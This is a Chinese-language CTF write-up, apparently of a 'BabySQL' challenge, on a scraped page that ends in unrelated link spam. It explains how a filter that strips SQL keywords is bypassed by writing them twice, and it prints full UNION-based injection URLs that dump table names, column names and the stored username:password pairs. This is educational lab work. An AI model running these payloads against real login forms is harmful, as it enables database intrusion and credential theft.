当前位置: 首页 > news >正文

自建网站平台 优帮云友情链接软件

自建网站平台 优帮云,友情链接软件,免费做彩页网站,西安搜推宝网络科技有限公司信息搜集 进入界面: 输入用户名为admin,密码随便输一个: 发现是GET传参,有username和password两个传参点。 我们测试一下password点位能不能注入: 单引号闭合报错,根据报错信息,我们可以判断…

信息搜集

进入界面:
在这里插入图片描述
输入用户名为admin,密码随便输一个:
在这里插入图片描述发现是GET传参,有username和password两个传参点。
我们测试一下password点位能不能注入:
在这里插入图片描述
单引号闭合报错,根据报错信息,我们可以判断是单引号闭合。

SQL注入

先order by测试一下字段数:

check.php?username=admin&password=1' order by 3--+

在这里插入图片描述
报错。看报错信息,吞掉了order的or 和by,即过滤了or和by。
使用双写绕过:

check.php?username=admin&password=1' oorrder bbyy 3--+

测试出字段数为3.

顺便用万能密码试试能不能登录:
在这里插入图片描述
接下来按联合注入的流程走:
在这里插入图片描述union 和 select 被过滤。双写绕过:

check.php?username=admin&password=1' uniunionon selselectect 1,2,3--+

在这里插入图片描述找到相应回显位,这里我们利用回显位3:

check.php?username=admin&password=1' uniunionon selselectect 1,2,database()--+ 数据库名为geekcheck.php?username=admin&password=1' uniunionon selselectect 1,2,(selselectect group_concat(table_name) frfromom infoorrmation_schema.tables whewherere table_schema='geek')--+ 数据表b4bsql,geekusercheck.php?username=admin&password=1' uniunionon selselectect 1,2,(selselectect group_concat(column_name) frfromom infoorrmation_schema.columns whewherere table_name='b4bsql')--+ 列名id,username,password(selselectect group_concat(username,":",passwoorrd) frfromom b4bsql)--+

在这里插入图片描述
得到flag.

总结

考察的是联合注入,但是增加了过滤。
使用双写绕过。

http://www.ds6.com.cn/news/42152.html

相关文章:

  • 销售手机网站百度网首页
  • 服装设计网站大全福州seo经理招聘
  • 建设企业网站的产品推广软文500字
  • vs网站制作教程金华网站推广
  • 贵阳网站制作专业北京网聘咨询有限公司
  • 建一个购物网站需要多少钱网络营销策略分析
  • 长春网站建设q479185700惠广州seo公司排名
  • 网站相关推荐怎么做郑州高端网站建设
  • 胶州家园网站建设深圳网站制作设计
  • 1 建设网站目的是什么意思方法seo
  • 湖北智能建站系统价格雅虎搜索引擎
  • 同城型网站开发重庆森林电影
  • 织梦网站栏目字体怎么调b2b网站有哪些平台
  • 上海建站 seo海外广告联盟平台推广
  • 武汉洪山做网站推广电商网站公司
  • 中山建网站报价免费网站java源码大全
  • 如何在年报网站上做遗失公告搜狗站长平台验证不了
  • 网站规划与站点的建立实训报告电商运营公司排名
  • 商城网站建设可以吗重庆seo建站
  • 网站如何做反爬百度搜索指数排名
  • 做h的小说网站有哪些网站seo课设
  • 广州专业建设网站广州网站排名优化公司
  • 网站开发 需求清单seo关键词排名优化推荐
  • 番禺建设网站公司如何使用免费b站推广网站
  • 网站开发常用技术今日足球最新预测比分
  • 公司网站的建设要注意什么seo分析案例
  • 运营什么网站好google官网入口
  • 国外做网站推广cms
  • mac能用vs做网站吗百度自己的宣传广告
  • 河南官网网站建设报价百度联盟广告收益